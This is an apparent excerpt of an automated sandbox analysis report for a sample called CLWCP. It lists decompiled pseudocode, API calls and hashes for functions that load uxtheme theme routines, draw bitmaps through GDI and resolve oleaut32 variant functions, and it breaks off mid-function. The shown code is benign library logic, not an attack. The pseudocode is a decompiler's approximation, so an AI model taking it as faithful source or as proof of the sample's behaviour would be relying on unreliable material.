                                  • Instruction Fuzzy Hash: 4CA0121040482001C140331D0C0313530406801620FC4076978F8542E2E92E013060DB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00427208, Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00427208(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x470a4c; // 0x20f0c14
				E00427000(_t2);
				_push(_t111);
				_push(0x4275bb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x470a48 =  *0x470a48 + 1;
				if( *0x470a44 == 0) {
					 *0x470a44 = LoadLibraryA("uxtheme.dll");
					if( *0x470a44 > 0) {
						 *0x470984 = GetProcAddress( *0x470a44, "OpenThemeData");
						 *0x470988 = GetProcAddress( *0x470a44, "CloseThemeData");
						 *0x47098c = GetProcAddress( *0x470a44, "DrawThemeBackground");
						 *0x470990 = GetProcAddress( *0x470a44, "DrawThemeText");
						 *0x470994 = GetProcAddress( *0x470a44, "GetThemeBackgroundContentRect");
						 *0x470998 = GetProcAddress( *0x470a44, "GetThemeBackgroundContentRect");
						 *0x47099c = GetProcAddress( *0x470a44, "GetThemePartSize");
						 *0x4709a0 = GetProcAddress( *0x470a44, "GetThemeTextExtent");
						 *0x4709a4 = GetProcAddress( *0x470a44, "GetThemeTextMetrics");
						 *0x4709a8 = GetProcAddress( *0x470a44, "GetThemeBackgroundRegion");
						 *0x4709ac = GetProcAddress( *0x470a44, "HitTestThemeBackground");
						 *0x4709b0 = GetProcAddress( *0x470a44, "DrawThemeEdge");
						 *0x4709b4 = GetProcAddress( *0x470a44, "DrawThemeIcon");
						 *0x4709b8 = GetProcAddress( *0x470a44, "IsThemePartDefined");
						 *0x4709bc = GetProcAddress( *0x470a44, "IsThemeBackgroundPartiallyTransparent");
						 *0x4709c0 = GetProcAddress( *0x470a44, "GetThemeColor");
						 *0x4709c4 = GetProcAddress( *0x470a44, "GetThemeMetric");
						 *0x4709c8 = GetProcAddress( *0x470a44, "GetThemeString");
						 *0x4709cc = GetProcAddress( *0x470a44, "GetThemeBool");
						 *0x4709d0 = GetProcAddress( *0x470a44, "GetThemeInt");
						 *0x4709d4 = GetProcAddress( *0x470a44, "GetThemeEnumValue");
						 *0x4709d8 = GetProcAddress( *0x470a44, "GetThemePosition");
						 *0x4709dc = GetProcAddress( *0x470a44, "GetThemeFont");
						 *0x4709e0 = GetProcAddress( *0x470a44, "GetThemeRect");
						 *0x4709e4 = GetProcAddress( *0x470a44, "GetThemeMargins");
						 *0x4709e8 = GetProcAddress( *0x470a44, "GetThemeIntList");
						 *0x4709ec = GetProcAddress( *0x470a44, "GetThemePropertyOrigin");
						 *0x4709f0 = GetProcAddress( *0x470a44, "SetWindowTheme");
						 *0x4709f4 = GetProcAddress( *0x470a44, "GetThemeFilename");
						 *0x4709f8 = GetProcAddress( *0x470a44, "GetThemeSysColor");
						 *0x4709fc = GetProcAddress( *0x470a44, "GetThemeSysColorBrush");
						 *0x470a00 = GetProcAddress( *0x470a44, "GetThemeSysBool");
						 *0x470a04 = GetProcAddress( *0x470a44, "GetThemeSysSize");
						 *0x470a08 = GetProcAddress( *0x470a44, "GetThemeSysFont");
						 *0x470a0c = GetProcAddress( *0x470a44, "GetThemeSysString");
						 *0x470a10 = GetProcAddress( *0x470a44, "GetThemeSysInt");
						 *0x470a14 = GetProcAddress( *0x470a44, "IsThemeActive");
						 *0x470a18 = GetProcAddress( *0x470a44, "IsAppThemed");
						 *0x470a1c = GetProcAddress( *0x470a44, "GetWindowTheme");
						 *0x470a20 = GetProcAddress( *0x470a44, "EnableThemeDialogTexture");
						 *0x470a24 = GetProcAddress( *0x470a44, "IsThemeDialogTextureEnabled");
						 *0x470a28 = GetProcAddress( *0x470a44, "GetThemeAppProperties");
						 *0x470a2c = GetProcAddress( *0x470a44, "SetThemeAppProperties");
						 *0x470a30 = GetProcAddress( *0x470a44, "GetCurrentThemeName");
						 *0x470a34 = GetProcAddress( *0x470a44, "GetThemeDocumentationProperty");
						 *0x470a38 = GetProcAddress( *0x470a44, "DrawThemeParentBackground");
						 *0x470a3c = GetProcAddress( *0x470a44, "EnableTheming");
					}
				}
				_v5 =  *0x470a44 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x4275c2);
				_t6 =  *0x470a4c; // 0x20f0c14
				return E00427008(_t6);
			}








                                  0x00427212
                                  0x00427217
                                  0x0042721e
                                  0x0042721f
                                  0x00427224
                                  0x00427227
                                  0x0042722a
                                  0x00427233
                                  0x00427243
                                  0x00427248
                                  0x0042725b
                                  0x0042726d
                                  0x0042727f
                                  0x00427291
                                  0x004272a3
                                  0x004272b5
                                  0x004272c7
                                  0x004272d9
                                  0x004272eb
                                  0x004272fd
                                  0x0042730f
                                  0x00427321
                                  0x00427333
                                  0x00427345
                                  0x00427357
                                  0x00427369
                                  0x0042737b
                                  0x0042738d
                                  0x0042739f
                                  0x004273b1
                                  0x004273c3
                                  0x004273d5
                                  0x004273e7
                                  0x004273f9
                                  0x0042740b
                                  0x0042741d
                                  0x0042742f
                                  0x00427441
                                  0x00427453
                                  0x00427465
                                  0x00427477
                                  0x00427489
                                  0x0042749b
                                  0x004274ad
                                  0x004274bf
                                  0x004274d1
                                  0x004274e3
                                  0x004274f5
                                  0x00427507
                                  0x00427519
                                  0x0042752b
                                  0x0042753d
                                  0x0042754f
                                  0x00427561
                                  0x00427573
                                  0x00427585
                                  0x00427597
                                  0x00427597
                                  0x00427248
                                  0x0042759f
                                  0x004275a5
                                  0x004275a8
                                  0x004275ab
                                  0x004275b0
                                  0x004275ba

                                  APIs
                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,004275BB), ref: 0042723E
                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00427256
                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00427268
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042727A
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042728C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042729E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004272B0
                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 004272C2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 004272D4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 004272E6
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 004272F8
                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042730A
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042731C
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042732E
                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00427340
                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00427352
                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00427364
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00427376
                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00427388
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042739A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 004273AC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 004273BE
                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 004273D0
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 004273E2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 004273F4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00427406
                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00427418
                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042742A
                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042743C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042744E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00427460
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00427472
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00427484
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00427496
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 004274A8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 004274BA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 004274CC
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 004274DE
                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 004274F0
                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00427502
                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00427514
                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00427526
                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00427538
                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042754A
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042755C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042756E
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00427580
                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 00427592
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                  • API String ID: 2238633743-2910565190
                                  • Opcode ID: e586c8116ff2973dec659b17973677e8386abe6ebd20767c6a839bddaafd7ff4
                                  • Instruction ID: c152d5341cfc55835a787ad860a9f8af7f86c9b1445a513f6f7505d0f3677ab6
                                  • Opcode Fuzzy Hash: e586c8116ff2973dec659b17973677e8386abe6ebd20767c6a839bddaafd7ff4
                                  • Instruction Fuzzy Hash: 3EA118F4B8A760EFDB00FBF5AC86A2537A8EB9570075105BAB405DF292D67C98408F1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041EE84, Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 250windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E0041EE84(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, char _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t161;
				intOrPtr _t169;
				intOrPtr _t173;
				struct HDC__* _t175;
				int _t177;
				void* _t179;
				void* _t180;
				intOrPtr _t181;

				_t179 = _t180;
				_t181 = _t180 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t175 = __eax;
				_t177 = _a16;
				_t161 = _a20;
				_v13 = 1;
				_t78 =  *0x46fdbc; // 0x46e0c4
				if( *_t78 != 2 || _t161 != _a40 || _t177 != _a36) {
					_v40 = 0;
					_push(0);
					L00406374();
					_v20 = E0041ECD4(0);
					_push(_t179);
					_push(0x41f10a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t181;
					_push(_t177);
					_push(_t161);
					_push(_a32);
					L0040636C();
					_v24 = E0041ECD4(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x470898; // 0xad0807a3
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L004064E4();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L004064E4();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x470898; // 0xad0807a3
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L004064E4();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L004064E4();
						_v40 = _t135;
					}
					_push(_v20);
					L004064B4();
					StretchBlt(_v20, 0, 0, _t161, _t177, _a12, _a8, _a4, _t161, _t177, 0xcc0020);
					_t49 =  &_a24; // 0x41e34a
					StretchBlt(_v20, 0, 0, _t161, _t177, _a32, _a28,  *_t49, _t161, _t177, 0x440328);
					_v32 = SetTextColor(_t175, 0);
					_v36 = SetBkColor(_t175, 0xffffff);
					StretchBlt(_t175, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t161, _t177, 0x8800c6);
					StretchBlt(_t175, _v8, _v12, _a40, _a36, _v20, 0, 0, _t161, _t177, 0x660046);
					_t67 =  &_v32; // 0x41e34a
					SetTextColor(_t175,  *_t67);
					SetBkColor(_t175, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(0x41f111);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L004064E4();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L0040636C();
					_v24 = E0041ECD4(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t179);
					_push(0x41ef5d);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t181;
					_t16 =  &_a24; // 0x41e34a
					MaskBlt(_t175, _v8, _v12, _a40, _a36, _a32, _a28,  *_t16, _v24, _a8, _a4, 0xaa0029);
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(0x41f111);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                  0x0041ee85
                                  0x0041ee87
                                  0x0041ee8d
                                  0x0041ee90
                                  0x0041ee93
                                  0x0041ee95
                                  0x0041ee98
                                  0x0041ee9b
                                  0x0041ee9f
                                  0x0041eea7
                                  0x0041ef66
                                  0x0041ef69
                                  0x0041ef6b
                                  0x0041ef75
                                  0x0041ef7a
                                  0x0041ef7b
                                  0x0041ef80
                                  0x0041ef83
                                  0x0041ef86
                                  0x0041ef87
                                  0x0041ef8b
                                  0x0041ef8c
                                  0x0041ef96
                                  0x0041efa6
                                  0x0041efa9
                                  0x0041efab
                                  0x0041efb0
                                  0x0041efb1
                                  0x0041efb4
                                  0x0041efb5
                                  0x0041efba
                                  0x0041efbd
                                  0x0041efc2
                                  0x0041efc6
                                  0x0041efc7
                                  0x0041efd0
                                  0x0041efe6
                                  0x0041efe8
                                  0x0041efed
                                  0x0041efee
                                  0x0041eff1
                                  0x0041eff2
                                  0x0041eff7
                                  0x0041efd2
                                  0x0041efd2
                                  0x0041efd7
                                  0x0041efd8
                                  0x0041efdb
                                  0x0041efdc
                                  0x0041efe1
                                  0x0041efe1
                                  0x0041effd
                                  0x0041effe
                                  0x0041f020
                                  0x0041f02c
                                  0x0041f042
                                  0x0041f04f
                                  0x0041f05d
                                  0x0041f084
                                  0x0041f0a9
                                  0x0041f0ae
                                  0x0041f0b3
                                  0x0041f0bd
                                  0x0041f0c6
                                  0x0041f0d0
                                  0x0041f0d0
                                  0x0041f0d9
                                  0x0041f0e0
                                  0x0041f0e3
                                  0x0041f0e6
                                  0x0041f0ef
                                  0x0041f0f1
                                  0x0041f0f6
                                  0x0041f0fa
                                  0x0041f0fb
                                  0x0041f0fb
                                  0x0041f109
                                  0x0041eebf
                                  0x0041eebf
                                  0x0041eec1
                                  0x0041eec6
                                  0x0041eec7
                                  0x0041eed1
                                  0x0041eee1
                                  0x0041eee6
                                  0x0041eee7
                                  0x0041eeec
                                  0x0041eeef
                                  0x0041ef14
                                  0x0041ef31
                                  0x0041ef38
                                  0x0041ef3b
                                  0x0041ef3e
                                  0x0041ef50
                                  0x0041ef5c
                                  0x0041ef5c

                                  APIs
                                  • 72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 0041EEC7
                                  • SelectObject.GDI32(?,?), ref: 0041EEDC
                                  • MaskBlt.GDI32(?,?,?,?,?,?,00000000,JA,?,?,?,00AA0029,00000000,0041EF5D,?,?), ref: 0041EF31
                                  • SelectObject.GDI32(?,?), ref: 0041EF4B
                                  • DeleteObject.GDI32(?), ref: 0041EF57
                                  • 72E7A590.GDI32(00000000,00000000,?,?), ref: 0041EF6B
                                  • 72E7A520.GDI32(?,?,?,00000000,0041F10A,?,00000000,00000000,?,?), ref: 0041EF8C
                                  • SelectObject.GDI32(?,?), ref: 0041EFA1
                                  • 72E7B410.GDI32(?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A,?,00000000,00000000,?,?), ref: 0041EFB5
                                  • 72E7B410.GDI32(?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A,?,00000000,00000000), ref: 0041EFC7
                                  • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A), ref: 0041EFDC
                                  • 72E7B410.GDI32(?,AD0807A3,000000FF,?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000,0041F10A), ref: 0041EFF2
                                  • 72E7B150.GDI32(?,?,AD0807A3,000000FF,?,?,00000000,?,AD0807A3,00000000,?,?,?,?,?,00000000), ref: 0041EFFE
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041F020
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,JA,?,?,00440328), ref: 0041F042
                                  • SetTextColor.GDI32(?,00000000), ref: 0041F04A
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041F058
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041F084
                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041F0A9
                                  • SetTextColor.GDI32(?,JA), ref: 0041F0B3
                                  • SetBkColor.GDI32(?,00000000), ref: 0041F0BD
                                  • SelectObject.GDI32(?,00000000), ref: 0041F0D0
                                  • DeleteObject.GDI32(?), ref: 0041F0D9
                                  • 72E7B410.GDI32(?,00000000,00000000,0041F111,?,JA,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0041F0FB
                                  • DeleteDC.GDI32(?), ref: 0041F104
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                  • String ID: JA$JA
                                  • API String ID: 3348367721-1057708788
                                  • Opcode ID: e6a7a57a6bcdcb7ca1bad561a3649d3c8ec536144ad4729e17d53fefbc43e02b
                                  • Instruction ID: 20b2ababf6a685279657313d893606b65097871593a653aae91ececc4cc7da53
                                  • Opcode Fuzzy Hash: e6a7a57a6bcdcb7ca1bad561a3649d3c8ec536144ad4729e17d53fefbc43e02b
                                  • Instruction Fuzzy Hash: E68197B1A00209BFDB50DFA9CD81EEF77ECAB0C714F110459BA18E7281C639ED508B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB60, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040DB60() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4707a4 = E0040DB34("VariantChangeTypeEx", E0040D6CC, _t91);
				 *0x4707a8 = E0040DB34("VarNeg", E0040D6FC, _t91);
				 *0x4707ac = E0040DB34("VarNot", E0040D6FC, _t91);
				 *0x4707b0 = E0040DB34("VarAdd", E0040D708, _t91);
				 *0x4707b4 = E0040DB34("VarSub", E0040D708, _t91);
				 *0x4707b8 = E0040DB34("VarMul", E0040D708, _t91);
				 *0x4707bc = E0040DB34("VarDiv", E0040D708, _t91);
				 *0x4707c0 = E0040DB34("VarIdiv", E0040D708, _t91);
				 *0x4707c4 = E0040DB34("VarMod", E0040D708, _t91);
				 *0x4707c8 = E0040DB34("VarAnd", E0040D708, _t91);
				 *0x4707cc = E0040DB34("VarOr", E0040D708, _t91);
				 *0x4707d0 = E0040DB34("VarXor", E0040D708, _t91);
				 *0x4707d4 = E0040DB34("VarCmp", E0040D714, _t91);
				 *0x4707d8 = E0040DB34("VarI4FromStr", E0040D720, _t91);
				 *0x4707dc = E0040DB34("VarR4FromStr", E0040D78C, _t91);
				 *0x4707e0 = E0040DB34("VarR8FromStr", E0040D7F8, _t91);
				 *0x4707e4 = E0040DB34("VarDateFromStr", E0040D864, _t91);
				 *0x4707e8 = E0040DB34("VarCyFromStr", E0040D8D0, _t91);
				 *0x4707ec = E0040DB34("VarBoolFromStr", E0040D93C, _t91);
				 *0x4707f0 = E0040DB34("VarBstrFromCy", E0040D9BC, _t91);
				 *0x4707f4 = E0040DB34("VarBstrFromDate", E0040DA2C, _t91);
				_t46 = E0040DB34("VarBstrFromBool", E0040DAA0, _t91);
				 *0x4707f8 = _t46;
				return _t46;
			}






                                  0x0040db6e
                                  0x0040db82
                                  0x0040db98
                                  0x0040dbae
                                  0x0040dbc4
                                  0x0040dbda
                                  0x0040dbf0
                                  0x0040dc06
                                  0x0040dc1c
                                  0x0040dc32
                                  0x0040dc48
                                  0x0040dc5e
                                  0x0040dc74
                                  0x0040dc8a
                                  0x0040dca0
                                  0x0040dcb6
                                  0x0040dccc
                                  0x0040dce2
                                  0x0040dcf8
                                  0x0040dd0e
                                  0x0040dd24
                                  0x0040dd3a
                                  0x0040dd4a
                                  0x0040dd50
                                  0x0040dd57

                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040DB69
                                    • Part of subcall function 0040DB34: GetProcAddress.KERNEL32(00000000), ref: 0040DB4D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  • API String ID: 1646373207-1918263038
                                  • Opcode ID: 4243f23e8d56b6a86f21b7c9da3d0dcac949bc73896d07d2c7afcdc8d7dcf40b
                                  • Instruction ID: d2ceeb6b0f0e64ad66740c97f4dbf6861e930a435d234dc9bf0bcb5c12ef074a
                                  • Opcode Fuzzy Hash: 4243f23e8d56b6a86f21b7c9da3d0dcac949bc73896d07d2c7afcdc8d7dcf40b
                                  • Instruction Fuzzy Hash: C441CE65E162049BD3086BEEB80182A77E9DA44714365C03FF408FB7D5DB3CB88D9A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004225B8, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E004225B8(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00421AAC(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x4227b3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L004066E4();
					_v12 = E0041ECD4(0);
					_push(_v12);
					L00406374();
					_v20 = E0041ECD4(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L0040635C();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x4227ba);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00406944();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00406374();
							_v16 = E0041ECD4(_v12);
							_push(_t127);
							_push(0x42276b);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E00421EF0(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L004064E4();
								_push(_v16);
								L004064B4();
								_push(0);
								_push(_t123);
								_push(_v20);
								L004064E4();
								_push(_v20);
								L004064B4();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L0040634C();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x422772);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}



























                                  0x004225b9
                                  0x004225bb
                                  0x004225c1
                                  0x004225c3
                                  0x004225c5
                                  0x004225c9
                                  0x004225ce
                                  0x004227c3
                                  0x004225e8
                                  0x004225ea
                                  0x004225f1
                                  0x004225f6
                                  0x004225fb
                                  0x004225fc
                                  0x00422601
                                  0x00422604
                                  0x00422607
                                  0x00422609
                                  0x00422613
                                  0x00422619
                                  0x0042261a
                                  0x00422624
                                  0x00422627
                                  0x00422629
                                  0x0042262b
                                  0x00422630
                                  0x00422631
                                  0x00422634
                                  0x00422635
                                  0x0042263a
                                  0x00422641
                                  0x00422785
                                  0x00422785
                                  0x00422787
                                  0x0042278a
                                  0x0042278d
                                  0x00422796
                                  0x0042279c
                                  0x0042279c
                                  0x004227a5
                                  0x004227a7
                                  0x004227aa
                                  0x004227ab
                                  0x004227ad
                                  0x00000000
                                  0x004227ad
                                  0x004227b2
                                  0x00422647
                                  0x00422654
                                  0x0042265d
                                  0x0042267e
                                  0x0042267f
                                  0x00422689
                                  0x0042268e
                                  0x0042268f
                                  0x00422694
                                  0x00422697
                                  0x0042269e
                                  0x004226be
                                  0x004226a0
                                  0x004226a0
